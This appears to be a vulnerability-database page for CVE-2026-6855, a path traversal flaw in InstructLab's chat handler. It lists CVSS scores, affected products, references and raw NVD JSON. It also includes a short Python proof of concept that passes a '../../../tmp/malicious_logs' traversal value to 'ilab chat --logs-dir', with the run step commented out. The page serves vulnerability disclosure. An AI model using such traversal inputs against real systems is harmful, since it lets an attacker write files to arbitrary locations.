CVE-2026-6855

Description

A flaw was found in InstructLab. A local attacker could exploit a path traversal vulnerability in the chat session handler by manipulating the `logs_dir` parameter. This allows the attacker to create new directories and write files to arbitrary locations on the system, potentially leading to unauthorized data modification or disclosure.

CVSS Details

CVSS Score

7.1

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:redhat:instructlab:-:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:o:redhat:enterprise_linux_ai:3.0:*:*:*:*:*:*:* - VULNERABLE

InstructLab (具体受影响版本未在提供信息中披露，建议查阅官方公告)

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# PoC for CVE-2026-6855: Path Traversal via logs_dir
# This script demonstrates how a malicious logs_dir parameter can be used.

import subprocess
import sys

def exploit_poc(target_path):
    # The malicious payload uses path traversal to escape the intended directory
    # For example, writing to /tmp/malicious/
    traversal_payload = "../../../tmp/malicious_logs"
    
    # Simulate the command that triggers the vulnerable chat session handler
    # InstructLab command line usage (hypothetical based on description)
    cmd = ["ilab", "chat", "--logs-dir", traversal_payload]
    
    try:
        print(f"[*] Attempting to exploit with payload: {traversal_payload}")
        # subprocess.run(cmd, check=True) # Uncomment to run actual exploit
        print("[+] If vulnerable, directories/files may be created at: /tmp/malicious_logs")
    except Exception as e:
        print(f"[-] Exploit failed: {e}")

if __name__ == "__main__":
    exploit_poc("/tmp/poc")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-6855
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-6855
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-6855/
[4] VulDB https://vuldb.com/cve/CVE-2026-6855
[5] https://access.redhat.com/security/cve/CVE-2026-6855
[6] https://bugzilla.redhat.com/show_bug.cgi?id=2460013

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-6855", "sourceIdentifier": "[email protected]", "published": "2026-04-22T13:16:22.410", "lastModified": "2026-05-20T13:20:33.817", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A flaw was found in InstructLab. A local attacker could exploit a path traversal vulnerability in the chat session handler by manipulating the `logs_dir` parameter. This allows the attacker to create new directories and write files to arbitrary locations on the system, potentially leading to unauthorized data modification or disclosure."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.8, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-22"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:redhat:instructlab:-:*:*:*:*:*:*:*", "matchCriteriaId": "F16DE2EF-B42B-4D18-B9E4-3114EBBD65B1"}, {"vulnerable": true, "criteria": "cpe:2.3:o:redhat:enterprise_linux_ai:3.0:*:*:*:*:*:*:*", "matchCriteriaId": "531FF57A-65AE-482C-9A43-D1F2ECAD6ED0"}]}]}], "references": [{"url": "https://access.redhat.com/security/cve/CVE-2026-6855", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2460013", "source": "[email protected]", "tags": ["Issue Tracking", "Vendor Advisory"]}]}}